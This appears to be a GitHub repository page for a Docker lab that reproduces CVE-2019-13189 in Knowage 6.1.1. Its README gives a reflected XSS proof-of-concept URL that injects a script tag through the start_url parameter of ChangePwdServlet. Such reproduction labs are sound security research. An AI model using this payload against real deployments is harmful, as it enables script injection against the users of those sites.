Name		Name	Last commit message	Last commit date
parent directory ..
Dockerfile		Dockerfile
README.md		README.md
docker-compose.yml		docker-compose.yml
entrypoint.sh		entrypoint.sh
server.xml		server.xml

README.md

CVE-2019-13189

About

https://nvd.nist.gov/vuln/detail/CVE-2019-13189

PoC / Exploit

After authenticating access: http://SERVER_IP:8080/knowage/ChangePwdServlet?start_url=test"><script>alert(1)</script>test

Environment used

Knowage 6.1.1

Requirements

git
docker
docker-compose
At least 2GB RAM

Reproduction

Terminal

docker-compose up

Web Browser
- Go to http://SERVER_IP:8080/knowage/ChangePwdServlet?start_url=test"><script>alert(1)</script>test, this performs XSS